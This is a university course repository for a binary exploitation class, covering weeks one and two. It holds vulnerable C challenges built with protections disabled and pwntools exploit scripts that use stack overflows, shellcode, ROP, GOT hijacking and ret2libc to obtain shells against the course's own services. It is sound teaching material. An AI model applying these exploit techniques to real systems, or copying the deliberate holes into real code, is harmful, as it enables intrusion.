├── LICENSE ├── Makefile ├── README.md ├── week1 ├── Makefile ├── bof │ ├── Dockerfile │ ├── share │ │ ├── bof │ │ ├── flag │ │ └── run.sh │ └── xinetd ├── casino │ ├── Dockerfile │ ├── share │ │ ├── casino │ │ ├── flag │ │ └── run.sh │ └── xinetd ├── docker-compose.yml ├── exp │ ├── bof.py │ ├── casino.py │ └── orw.py ├── orw │ ├── Dockerfile │ ├── share │ │ ├── flag │ │ ├── orw │ │ └── run.sh │ └── xinetd └── src │ ├── bof.c │ ├── casino.c │ ├── demo.c │ └── orw.c ├── week2 ├── Makefile ├── casino++ │ ├── Dockerfile │ ├── share │ │ ├── casino++ │ │ ├── flag │ │ └── run.sh │ └── xinetd ├── docker-compose.yml ├── exp │ ├── casino++.py │ ├── libc-2.27.so │ ├── ret2libc.py │ ├── ret2plt.py │ └── rop.py ├── ret2libc │ ├── Dockerfile │ ├── share │ │ ├── flag │ │ ├── ret2libc │ │ └── run.sh │ └── xinetd ├── ret2plt │ ├── Dockerfile │ ├── share │ │ ├── flag │ │ ├── ret2plt │ │ └── run.sh │ └── xinetd ├── rop │ ├── Dockerfile │ ├── share │ │ ├── flag │ │ ├── rop │ │ └── run.sh │ └── xinetd └── src │ ├── casino++.c │ ├── ret2libc.c │ ├── ret2plt.c │ └── rop.c └── week3 ├── Makefile ├── docker-compose.yml ├── election ├── Dockerfile ├── share │ ├── election │ ├── flag │ └── run.sh └── xinetd ├── exp ├── election.py ├── libc-2.23.so ├── libc-2.27.so ├── note++.py ├── note.py ├── t-note.py └── uaf.py ├── note++ ├── Dockerfile ├── share │ ├── flag │ ├── note++ │ └── run.sh └── xinetd ├── note ├── Dockerfile ├── share │ ├── flag │ ├── note │ └── run.sh └── xinetd ├── src ├── election.c ├── note++.c ├── note.c ├── t-note.c └── uaf.c ├── t-note ├── Dockerfile ├── share │ ├── flag │ ├── run.sh │ └── t-note └── xinetd └── uaf ├── Dockerfile ├── share ├── flag ├── run.sh └── uaf └── xinetd /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2019 yuawn 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /Makefile: -------------------------------------------------------------------------------- 1 | all: 2 | make -C week1 3 | make -C week2 4 | make -C week3 5 | 6 | clean: 7 | make -C week1 clean 8 | make -C week2 clean 9 | make -C week3 clean -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # NTU Computer Security Fall 2019 - 台大 計算機安全 2 | 擔任台大大助教,與三週 Pwn 課程講師。 3 | 4 | ## 課程內容 5 | ### Week 1: Binary Exploitation - Basic 6 | 7 | - Slide: [speakerdeck.com/yuawn/binary-exploitation-basic](https://speakerdeck.com/yuawn/binary-exploitation-basic) 8 | - Video: [youtu.be/U8N6aE-Nq-Q](https://youtu.be/U8N6aE-Nq-Q) 9 | - Lab: 10 | - [bof](week1/exp/bof.py) 11 | - stack buffer overflow, overwrite return address 12 | - [orw](week1/exp/orw.py) 13 | - seccomp filter syscall, shellcode 14 | - Homework: 15 | - [Casino](week1/exp/casino.py) 16 | - oob array access, GOT hijacking, shellcode 17 | 18 | ### Week 2: Binary Exploitation 19 | 20 | - Slide: [speakerdeck.com/yuawn/binary-exploitation](https://speakerdeck.com/yuawn/binary-exploitation) 21 | - Video: [youtu.be/5D7tvxpSUUM](https://youtu.be/5D7tvxpSUUM) 22 | - Lab: 23 | - [ROP](week2/exp/rop.py) 24 | - ROP bypass NX protection 25 | - [ret2plt](week2/exp/ret2plt.py) 26 | - Practice using plt functions 27 | - [ret2libc](week2/exp/ret2libc.py) 28 | - information leak, bypass ASLR, practice ret2libc technique 29 | - Homework: 30 | - [Casino++](week2/exp/casino++.py) 31 | - oob array access, GOT hijacking, leak libc, ret2libc hijack plt function to system() 32 | 33 | ### Week 3: Heap Exploitation 34 | 35 | - Slide: [speakerdeck.com/yuawn/heap-exploitation](https://speakerdeck.com/yuawn/heap-exploitation) 36 | - Video: [youtu.be/rMqvL9j0QaM](https://youtu.be/rMqvL9j0QaM) 37 | - Lab: 38 | - [UAF](week3/exp/uaf.py) 39 | - Practice using UAF to leak address and exploit. 40 | - [Note](week3/exp/note.py) 41 | - double free, fastbin attack 42 | - [T-Note](week3/exp/t-note.py) 43 | - Tcache dup 44 | - Homework: 45 | - [Election](week3/exp/election.py) 46 | - stack pivoting, ret2csu csu gadget 47 | - [Note++](week3/exp/note++.py) 48 | - off-by-one null byte overflow, fastbin dup, forge chunk size to leak libc, overwrite __malloc_hook, one gadget 49 | 50 | ## 課程題目 challenges 51 | - 各 week 中 `src` 底下為題目原始碼 52 | - 各 week 中 `exp` 底下為答案解法 exploits 53 | 54 | ### 環境 environment 55 | - OS: ubuntu 18.04 56 | - GCC: gcc (Ubuntu 7.4.0-1ubuntu1~18.04.1) 7.4.0 57 | 58 | ### Build 59 | 60 | ```bash 61 | cd week1 # week2 week3 62 | docker-compose up -d 63 | ``` 64 | 65 | ### Compile (如需自行重編題目 binary) 66 | 67 | ```bash 68 | sudo apt install libseccomp-dev 69 | make 70 | ``` 71 | -------------------------------------------------------------------------------- /week1/Makefile: -------------------------------------------------------------------------------- 1 | all: src/bof.c src/orw.c src/casino.c 2 | gcc src/bof.c -o ./bof/share/bof -no-pie -fno-stack-protector 3 | gcc src/orw.c -o ./orw/share/orw -no-pie -fno-stack-protector -z execstack -lseccomp 4 | gcc src/casino.c -o ./casino/share/casino -no-pie -z execstack 5 | 6 | clean: 7 | rm bof/share/bof orw/share/orw casino/share/casino -------------------------------------------------------------------------------- /week1/bof/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM ubuntu:18.04 2 | MAINTAINER yuawn 3 | RUN apt-get update 4 | RUN apt-get install xinetd -y 5 | RUN useradd -m bof 6 | RUN chmod 774 /tmp 7 | RUN chmod -R 774 /var/tmp 8 | RUN chmod -R 774 /dev 9 | RUN chmod -R 774 /run 10 | RUN chmod 1733 /tmp /var/tmp /dev/shm 11 | RUN chown -R root:root /home/bof 12 | CMD ["/usr/sbin/xinetd","-dontfork"] -------------------------------------------------------------------------------- /week1/bof/share/bof: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/yuawn/NTU-Computer-Security/d6af31d7b71304ff6f44c8faa454815783923035/week1/bof/share/bof -------------------------------------------------------------------------------- /week1/bof/share/flag: -------------------------------------------------------------------------------- 1 | FLAG{Pwned_7he_f1rs7_b1n4ry} -------------------------------------------------------------------------------- /week1/bof/share/run.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # 3 | exec 2>/dev/null 4 | timeout 60 /home/bof/bof 5 | -------------------------------------------------------------------------------- /week1/bof/xinetd: -------------------------------------------------------------------------------- 1 | service bof 2 | { 3 | disable = no 4 | type = UNLISTED 5 | wait = no 6 | server = /home/bof/run.sh 7 | socket_type = stream 8 | protocol = tcp 9 | user = bof 10 | port = 4597 11 | flags = REUSE 12 | per_source = 5 13 | rlimit_cpu = 3 14 | nice = 18 15 | } 16 | -------------------------------------------------------------------------------- /week1/casino/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM ubuntu:18.04 2 | MAINTAINER yuawn 3 | RUN apt-get update 4 | RUN apt-get install xinetd -y 5 | RUN useradd -m casino 6 | RUN chmod 774 /tmp 7 | RUN chmod -R 774 /var/tmp 8 | RUN chmod -R 774 /dev 9 | RUN chmod -R 774 /run 10 | RUN chmod 1733 /tmp /var/tmp /dev/shm 11 | RUN chown -R root:root /home/casino 12 | CMD ["/usr/sbin/xinetd","-dontfork"] -------------------------------------------------------------------------------- /week1/casino/share/casino: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/yuawn/NTU-Computer-Security/d6af31d7b71304ff6f44c8faa454815783923035/week1/casino/share/casino -------------------------------------------------------------------------------- /week1/casino/share/flag: -------------------------------------------------------------------------------- 1 | FLAG{0verf1ow_1n_ev3rywhere!} -------------------------------------------------------------------------------- /week1/casino/share/run.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # 3 | exec 2>/dev/null 4 | timeout 60 /home/casino/casino 5 | -------------------------------------------------------------------------------- /week1/casino/xinetd: -------------------------------------------------------------------------------- 1 | service casino 2 | { 3 | disable = no 4 | type = UNLISTED 5 | wait = no 6 | server = /home/casino/run.sh 7 | socket_type = stream 8 | protocol = tcp 9 | user = casino 10 | port = 4597 11 | flags = REUSE 12 | per_source = 5 13 | rlimit_cpu = 3 14 | nice = 18 15 | } 16 | -------------------------------------------------------------------------------- /week1/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '2' 2 | services: 3 | bof: 4 | build: ./bof/ 5 | volumes: 6 | - ./bof/share:/home/bof:ro 7 | - ./bof/xinetd:/etc/xinetd.d/bof:ro 8 | - ./tmp:/tmp:ro 9 | ports: 10 | - "10170:4597" 11 | orw: 12 | build: ./orw/ 13 | volumes: 14 | - ./orw/share:/home/orw:ro 15 | - ./orw/xinetd:/etc/xinetd.d/orw:ro 16 | - ./tmp:/tmp:ro 17 | ports: 18 | - "10171:4597" 19 | casino: 20 | build: ./casino/ 21 | volumes: 22 | - ./casino/share:/home/casino:ro 23 | - ./casino/xinetd:/etc/xinetd.d/casino:ro 24 | - ./tmp:/tmp:ro 25 | ports: 26 | - "10172:4597" -------------------------------------------------------------------------------- /week1/exp/bof.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | from pwn import * 3 | 4 | #y = process( '../bof/share/bof' ) 5 | y = remote( 'localhost' , 10170 ) 6 | #y = remote( 'edu-ctf.csie.org' , 10170 ) 7 | 8 | p = 'a' * 0x38 + p64( 0x40068b ) 9 | y.sendlineafter( '.' , p ) 10 | 11 | y.sendline( 'cat /home/`whoami`/flag' ) 12 | 13 | y.interactive() -------------------------------------------------------------------------------- /week1/exp/casino.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | from pwn import * 3 | 4 | context.arch = 'amd64' 5 | y = remote( 'localhost' , 10172 ) 6 | #y = remote( 'edu-ctf.csie.org' , 10172 ) 7 | #y = process( '../casino/share/casino' ) 8 | 9 | rnd = [83,86,77,15,93,35] 10 | 11 | name = 0x6020f0 12 | y.sendafter( ':' , '\0' * 0x20 + asm( shellcraft.sh() ) ) 13 | y.sendafter( ':' , '27' ) 14 | 15 | for i in range( 6 ): 16 | y.sendafter( ':' , '7\n' ) 17 | y.sendafter( ']: ' , '1\n' ) 18 | y.sendafter( ': ' , '-42\n' ) 19 | y.sendafter( ': ' , '0\n' ) 20 | 21 | for i in rnd: 22 | y.sendafter( ':' , str(i) + '\n' ) 23 | 24 | y.sendafter( ']: ' , '1\n' ) 25 | y.sendafter( ': ' , '-43' ) 26 | y.sendafter( ': ' , str( name + 0x20 ) ) 27 | 28 | 29 | y.interactive() 30 | 31 | 32 | ''' 33 | 0: 83 34 | 1: 86 35 | 2: 77 36 | 3: 15 37 | 4: 93 38 | 5: 35 39 | 40 | 6: 86 41 | 7: 92 42 | 8: 49 43 | 9: 21 44 | 10: 62 45 | 11: 27 46 | 47 | 12: 90 48 | 13: 59 49 | 14: 63 50 | 15: 26 51 | 16: 40 52 | 17: 26 53 | 18: 72 54 | 19: 36 55 | ''' 56 | -------------------------------------------------------------------------------- /week1/exp/orw.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | from pwn import * 3 | 4 | context.arch = 'amd64' 5 | 6 | y = remote( 'localhost' , 10171 ) 7 | #y = remote( 'edu-ctf.csie.org' , 10171 ) 8 | #y = process( '../orw/share/orw' ) 9 | #pause() 10 | 11 | # handcraft assembly 12 | sc = asm(''' 13 | mov rax, 0x67616c662f77 14 | push rax 15 | mov rax, 0x726f2f656d6f682f 16 | push rax 17 | mov rdi, rsp 18 | xor rsi, rsi 19 | xor rdx, rdx 20 | mov rax, 2 21 | syscall 22 | // open( "/home/orw/flag" , 0 , 0 ) 23 | 24 | mov rdi, rax 25 | mov rsi, rsp 26 | mov rdx, 0x50 27 | mov rax, 0 28 | syscall 29 | // read( fd , rsp , 0x50 ) 30 | 31 | mov rdi, 1 32 | mov rax, 1 33 | syscall 34 | // write( 1 , rsp , 0x50 ) 35 | 36 | ''') 37 | 38 | # pwnlib shellcraft 39 | ''' 40 | sc = asm( 41 | shellcraft.pushstr( "/home/orw/flag" ) + 42 | shellcraft.open( 'rsp' , 0 , 0 ) + 43 | shellcraft.read( 'rax' , 'rsp' , 0x30 ) + 44 | shellcraft.write( 1 , 'rsp' , 0x30 ) 45 | ) 46 | ''' 47 | 48 | y.sendafter( '>' , sc ) 49 | 50 | y.sendlineafter( ':)' , 'a' * 0x18 + p64( 0x6010a0 ) ) 51 | 52 | y.interactive() -------------------------------------------------------------------------------- /week1/orw/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM ubuntu:18.04 2 | MAINTAINER yuawn 3 | RUN apt-get update 4 | RUN apt-get install xinetd -y 5 | RUN useradd -m orw 6 | RUN chmod 774 /tmp 7 | RUN chmod -R 774 /var/tmp 8 | RUN chmod -R 774 /dev 9 | RUN chmod -R 774 /run 10 | RUN chmod 1733 /tmp /var/tmp /dev/shm 11 | RUN chown -R root:root /home/orw 12 | CMD ["/usr/sbin/xinetd","-dontfork"] -------------------------------------------------------------------------------- /week1/orw/share/flag: -------------------------------------------------------------------------------- 1 | FLAG{H0w_2_she1lc0d1ng} -------------------------------------------------------------------------------- /week1/orw/share/orw: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/yuawn/NTU-Computer-Security/d6af31d7b71304ff6f44c8faa454815783923035/week1/orw/share/orw -------------------------------------------------------------------------------- /week1/orw/share/run.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # 3 | exec 2>/dev/null 4 | timeout 60 /home/orw/orw 5 | -------------------------------------------------------------------------------- /week1/orw/xinetd: -------------------------------------------------------------------------------- 1 | service orw 2 | { 3 | disable = no 4 | type = UNLISTED 5 | wait = no 6 | server = /home/orw/run.sh 7 | socket_type = stream 8 | protocol = tcp 9 | user = orw 10 | port = 4597 11 | flags = REUSE 12 | per_source = 5 13 | rlimit_cpu = 3 14 | nice = 18 15 | } 16 | -------------------------------------------------------------------------------- /week1/src/bof.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | 5 | void try_to_call_me(){ 6 | system("sh"); 7 | } 8 | 9 | int main(){ 10 | 11 | setvbuf(stdout,0,2,0); 12 | setvbuf(stdin,0,2,0); 13 | setvbuf(stderr,0,2,0); 14 | 15 | puts( "Welcome to EDU CTF 2019." ); 16 | 17 | char buf[0x30]; 18 | gets( buf ); 19 | 20 | return 0; 21 | } -------------------------------------------------------------------------------- /week1/src/casino.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | 6 | int lottery[6] = {0}, guess[6] = {0}; 7 | char name[0x10] = {0}; 8 | int age, seed; 9 | 10 | void init(){ 11 | setvbuf(stdout,0,2,0); 12 | setvbuf(stdin,0,2,0); 13 | setvbuf(stderr,0,2,0); 14 | seed = time(0); 15 | } 16 | 17 | int read_int(){ 18 | char buf[0x10]; 19 | __read_chk( 0 , buf , 0xf , 0x10 ); 20 | return atoi( buf ); 21 | } 22 | 23 | void welcome(){ 24 | puts( "+--------------------+" ); 25 | puts( "| Casino |" ); 26 | puts( "+--------------------+" ); 27 | puts( "" ); 28 | } 29 | 30 | 31 | void casino(){ 32 | 33 | srand( seed ); 34 | for( int i = 0 ; i < 6 ; ++i ) lottery[i] = rand() % 100; 35 | 36 | int try = 2, idx; 37 | 38 | while( try-- ){ 39 | printf( "\n$$$$$$$ Lottery $$$$$$$\n " ); 40 | 41 | for( int i = 0 ; i < 6 ; ++i ){ 42 | printf( "Chose the number %d: " , i ); 43 | guess[i] = read_int(); 44 | } 45 | 46 | printf( "Change the number? [1:yes 0:no]: " ); 47 | if( read_int() == 1 ){ 48 | printf( "Which number [1 ~ 6]: " ); 49 | idx = read_int() - 1; 50 | printf( "Chose the number %d: " , idx ); 51 | guess[idx] = read_int(); 52 | } 53 | 54 | for( int i = 0 ; i < 6 ; ++i ){ 55 | if( guess[i] != lottery[i] ) break; 56 | if( i == 5 ){ 57 | puts( "You win! Hacker don't need luck :P" ); 58 | } 59 | } 60 | } 61 | 62 | printf( "You lose.\nBye~\n " ); 63 | } 64 | 65 | 66 | int main(){ 67 | 68 | init(); 69 | welcome(); 70 | 71 | puts( "Show me your passport." ); 72 | printf( "Your name: " ); 73 | read( 0 , name , 0x100 ); // Oops 74 | 75 | printf( "Your age: " ); 76 | age = read_int(); 77 | 78 | if( age < 20 ){ 79 | puts( "You can not enter the casino!" ); 80 | } 81 | else{ 82 | casino(); 83 | } 84 | 85 | return 0; 86 | } -------------------------------------------------------------------------------- /week1/src/demo.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | int main(){ 5 | 6 | char buf[0x100]; 7 | read( 0 , buf , 0x100 ); 8 | 9 | puts( "Hello World!" ); 10 | 11 | return 0; 12 | } -------------------------------------------------------------------------------- /week1/src/orw.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | 6 | 7 | void init(){ 8 | setvbuf(stdout,0,2,0); 9 | setvbuf(stdin,0,2,0); 10 | setvbuf(stderr,0,2,0); 11 | } 12 | 13 | void seccomp(){ 14 | scmp_filter_ctx ctx; 15 | ctx = seccomp_init(SCMP_ACT_KILL); 16 | seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(open), 0); 17 | seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(read), 0); 18 | seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(write), 0); 19 | seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(exit), 0); 20 | seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(exit_group), 0); 21 | seccomp_load(ctx); 22 | } 23 | 24 | char sc[0x100]; 25 | 26 | int main(){ 27 | 28 | init(); 29 | seccomp(); 30 | 31 | puts( "Give me your shellcode>" ); 32 | read( 0 , sc , 0x100 ); 33 | 34 | puts( "I give you bof, you know what to do :)" ); 35 | char buf[0x10]; 36 | gets( buf ); 37 | 38 | return 0; 39 | } -------------------------------------------------------------------------------- /week2/Makefile: -------------------------------------------------------------------------------- 1 | all: src/rop.c src/ret2plt.c src/ret2libc.c src/casino++.c 2 | gcc src/rop.c -o ./rop/share/rop -no-pie -fno-stack-protector --static 3 | gcc src/ret2plt.c -o ./ret2plt/share/ret2plt -no-pie -fno-stack-protector 4 | gcc src/ret2libc.c -o ./ret2libc/share/ret2libc -no-pie -fno-stack-protector 5 | gcc src/casino++.c -o ./casino++/share/casino++ -no-pie 6 | 7 | clean: 8 | rm rop/share/rop ret2plt/share/ret2plt ret2libc/share/ret2libc casino++/share/casino++ -------------------------------------------------------------------------------- /week2/casino++/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM ubuntu:18.04 2 | MAINTAINER yuawn 3 | RUN apt-get update 4 | RUN apt-get install xinetd -y 5 | RUN useradd -m casino++ 6 | RUN chmod 774 /tmp 7 | RUN chmod -R 774 /var/tmp 8 | RUN chmod -R 774 /dev 9 | RUN chmod -R 774 /run 10 | RUN chmod 1733 /tmp /var/tmp /dev/shm 11 | RUN chown -R root:root /home/casino++ 12 | CMD ["/usr/sbin/xinetd","-dontfork"] -------------------------------------------------------------------------------- /week2/casino++/share/casino++: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/yuawn/NTU-Computer-Security/d6af31d7b71304ff6f44c8faa454815783923035/week2/casino++/share/casino++ -------------------------------------------------------------------------------- /week2/casino++/share/flag: -------------------------------------------------------------------------------- 1 | FLAG{Y0u_pwned_me_ag4in_Pwn1ng_n3ver_d1e} 2 | -------------------------------------------------------------------------------- /week2/casino++/share/run.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # 3 | exec 2>/dev/null 4 | timeout 60 /home/casino++/casino++ 5 | -------------------------------------------------------------------------------- /week2/casino++/xinetd: -------------------------------------------------------------------------------- 1 | service casino++ 2 | { 3 | disable = no 4 | type = UNLISTED 5 | wait = no 6 | server = /home/casino++/run.sh 7 | socket_type = stream 8 | protocol = tcp 9 | user = casino++ 10 | port = 4597 11 | flags = REUSE 12 | per_source = 5 13 | rlimit_cpu = 3 14 | nice = 18 15 | } 16 | -------------------------------------------------------------------------------- /week2/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '2' 2 | services: 3 | rop: 4 | build: ./rop/ 5 | volumes: 6 | - ./rop/share:/home/rop:ro 7 | - ./rop/xinetd:/etc/xinetd.d/rop:ro 8 | - ./tmp:/tmp:ro 9 | ports: 10 | - "10173:4597" 11 | ret2plt: 12 | build: ./ret2plt/ 13 | volumes: 14 | - ./ret2plt/share:/home/ret2plt:ro 15 | - ./ret2plt/xinetd:/etc/xinetd.d/ret2plt:ro 16 | - ./tmp:/tmp:ro 17 | ports: 18 | - "10174:4597" 19 | ret2libc: 20 | build: ./ret2libc/ 21 | volumes: 22 | - ./ret2libc/share:/home/ret2libc:ro 23 | - ./ret2libc/xinetd:/etc/xinetd.d/ret2libc:ro 24 | - ./tmp:/tmp:ro 25 | ports: 26 | - "10175:4597" 27 | casino_pro: 28 | build: ./casino++/ 29 | volumes: 30 | - ./casino++/share:/home/casino++:ro 31 | - ./casino++/xinetd:/etc/xinetd.d/casino++:ro 32 | - ./tmp:/tmp:ro 33 | ports: 34 | - "10176:4597" 35 | -------------------------------------------------------------------------------- /week2/exp/casino++.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | from pwn import * 3 | 4 | l = ELF( 'libc-2.27.so' ) 5 | 6 | context.arch = 'amd64' 7 | #y = remote( 'edu-ctf.csie.org' , 10176 ) 8 | y = remote( 'localhost' , 10176 ) 9 | #y = process( '../casino++/share/casino++' ) 10 | 11 | def casino( ans , idx , num ): 12 | for i in ans: 13 | y.sendlineafter( ':' , str( i ) ) 14 | y.sendlineafter( ']: ' , '1' ) 15 | y.sendlineafter( ': ' , str( idx ) ) 16 | y.sendlineafter( ': ' , str( num ) ) 17 | 18 | 19 | lose = [0] * 6 20 | win = [61,68,32,22,69,20] 21 | 22 | name = 0x6020f0 23 | 24 | y.sendafter( ':' , '\0' * 0x10 + p64( 0x601ff0 ) + p64( 0 ) + asm( shellcraft.sh() ) ) 25 | y.sendafter( ':' , '27' ) 26 | 27 | casino( lose , -42 , 0 ) 28 | casino( win , -43 , 0x40095d ) # casino() 29 | 30 | casino( lose , -34 , 0 ) 31 | casino( win , -35 , 0x4006e6 ) 32 | 33 | l.address = u64( y.recv(6) + '\0\0' ) - l.sym.__libc_start_main 34 | success( 'libc -> %s' % hex( l.address ) ) 35 | 36 | win = [22,67,58,53,74,3] 37 | one = l.address + 0x10a38c 38 | 39 | casino( lose , -42 , 0 ) 40 | casino( win , -43 , 0x40095d ) # casino() 41 | 42 | casino( lose , -29 , l.sym.system & 0xffffffff ) # system() 43 | 44 | y.sendafter( ': ' , 'sh\n' ) 45 | 46 | sleep( 0.3 ) 47 | y.sendline( 'cat /home/`whoami`/flag' ) 48 | 49 | y.interactive() -------------------------------------------------------------------------------- /week2/exp/libc-2.27.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/yuawn/NTU-Computer-Security/d6af31d7b71304ff6f44c8faa454815783923035/week2/exp/libc-2.27.so -------------------------------------------------------------------------------- /week2/exp/ret2libc.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | from pwn import * 3 | 4 | context.arch = 'amd64' 5 | 6 | l = ELF( './libc-2.27.so' ) 7 | 8 | y = remote( 'localhost' , 10175 ) 9 | #y = remote( 'edu-ctf.csie.org' , 10175 ) 10 | #y = process( '../ret2libc/share/ret2libc' ) 11 | #pause() 12 | 13 | bss = 0x6b6000 14 | pop_rdi = 0x0000000000400733 15 | pop_rsi_r15 = 0x0000000000400731 16 | ret = 0x400506 17 | 18 | gets_plt = 0x400530 19 | puts_plt = 0x400520 20 | 21 | libc_start_main_got = 0x600ff0 22 | main = 0x400698 23 | 24 | p = flat( 25 | 'a' * 0x38, 26 | pop_rdi, 27 | libc_start_main_got, 28 | puts_plt, 29 | main 30 | ) 31 | 32 | y.sendlineafter( ':D' , p ) 33 | 34 | y.recvline() 35 | 36 | libc = u64( y.recv(6) + '\0\0' ) - 0x21ab0 37 | success( 'libc -> %s' % hex( libc ) ) 38 | 39 | system_off = 0x4f440 40 | system_func_ptr = libc + system_off 41 | bin_sh = libc + 0x1b3e9a 42 | 43 | #print '"/bin/sh" str :' , hex( l.search( '/bin/sh' ).next() ) 44 | 45 | # For demo 46 | ''' 47 | p = flat( 48 | 'a' * 0x38, 49 | ret, 50 | pop_rdi, 51 | l.search( '/bin/sh' ).next(), 52 | l.sym.system 53 | ) 54 | ''' 55 | 56 | p = flat( 57 | 'a' * 0x38, 58 | ret, 59 | pop_rdi, 60 | bin_sh, 61 | system_func_ptr 62 | ) 63 | y.sendlineafter( ':D' , p ) 64 | 65 | y.sendline( 'cat /home/`whoami`/flag' ) 66 | 67 | y.interactive() -------------------------------------------------------------------------------- /week2/exp/ret2plt.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | from pwn import * 3 | 4 | context.arch = 'amd64' 5 | 6 | y = remote( 'localhost' , 10174 ) 7 | #y = remote( 'edu-ctf.csie.org' , 10174 ) 8 | #y = process( '../ret2plt/share/ret2plt' ) 9 | #pause() 10 | 11 | pop_rdi = 0x0000000000400733 12 | 13 | gets_plt = 0x400530 14 | system_plt = 0x400520 15 | bss = 0x601070 16 | 17 | p = flat( 18 | 'a' * 0x38, 19 | pop_rdi, 20 | bss, 21 | gets_plt, 22 | pop_rdi, 23 | bss, 24 | system_plt 25 | ) 26 | 27 | y.sendlineafter( ':D' , p ) 28 | 29 | y.sendline( 'sh' ) 30 | 31 | y.sendline( 'cat /home/`whoami`/flag' ) 32 | 33 | y.interactive() -------------------------------------------------------------------------------- /week2/exp/rop.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | from pwn import * 3 | 4 | context.arch = 'amd64' 5 | 6 | y = remote( 'localhost' , 10173 ) 7 | #y = remote( 'edu-ctf.csie.org' , 10173 ) 8 | #y = process( '../rop/share/rop' ) 9 | #pause() 10 | 11 | 12 | pop_rax = 0x0000000000415714 13 | pop_rdi = 0x0000000000400686 14 | pop_rsi = 0x00000000004100f3 15 | pop_rdx = 0x0000000000449935 16 | mov_q_rdi_rsi = 0x000000000044709b # mov qword ptr [rdi], rsi ; ret 17 | syscall = 0x000000000047b68f 18 | 19 | pop_rdx_rsi = 0x000000000044beb9 20 | 21 | bss = 0x6b6030 22 | 23 | p = flat( 24 | 'a' * 0x38, 25 | pop_rdi, 26 | bss, 27 | pop_rsi, 28 | '/bin/sh\0', 29 | mov_q_rdi_rsi, 30 | pop_rsi, 31 | 0, 32 | pop_rdx, 33 | 0, 34 | pop_rax, 35 | 0x3b, 36 | syscall 37 | ) 38 | 39 | y.sendlineafter( ':D' , p ) 40 | 41 | y.sendline( 'cat /home/`whoami`/flag' ) 42 | 43 | y.interactive() -------------------------------------------------------------------------------- /week2/ret2libc/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM ubuntu:18.04 2 | MAINTAINER yuawn 3 | RUN apt-get update 4 | RUN apt-get install xinetd -y 5 | RUN useradd -m ret2libc 6 | RUN chmod 774 /tmp 7 | RUN chmod -R 774 /var/tmp 8 | RUN chmod -R 774 /dev 9 | RUN chmod -R 774 /run 10 | RUN chmod 1733 /tmp /var/tmp /dev/shm 11 | RUN chown -R root:root /home/ret2libc 12 | CMD ["/usr/sbin/xinetd","-dontfork"] -------------------------------------------------------------------------------- /week2/ret2libc/share/flag: -------------------------------------------------------------------------------- 1 | FLAG{ret21ibc_15_p0werfu1} 2 | c -------------------------------------------------------------------------------- /week2/ret2libc/share/ret2libc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/yuawn/NTU-Computer-Security/d6af31d7b71304ff6f44c8faa454815783923035/week2/ret2libc/share/ret2libc -------------------------------------------------------------------------------- /week2/ret2libc/share/run.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # 3 | exec 2>/dev/null 4 | timeout 60 /home/ret2libc/ret2libc 5 | -------------------------------------------------------------------------------- /week2/ret2libc/xinetd: -------------------------------------------------------------------------------- 1 | service ret2libc 2 | { 3 | disable = no 4 | type = UNLISTED 5 | wait = no 6 | server = /home/ret2libc/run.sh 7 | socket_type = stream 8 | protocol = tcp 9 | user = ret2libc 10 | port = 4597 11 | flags = REUSE 12 | per_source = 5 13 | rlimit_cpu = 3 14 | nice = 18 15 | } 16 | -------------------------------------------------------------------------------- 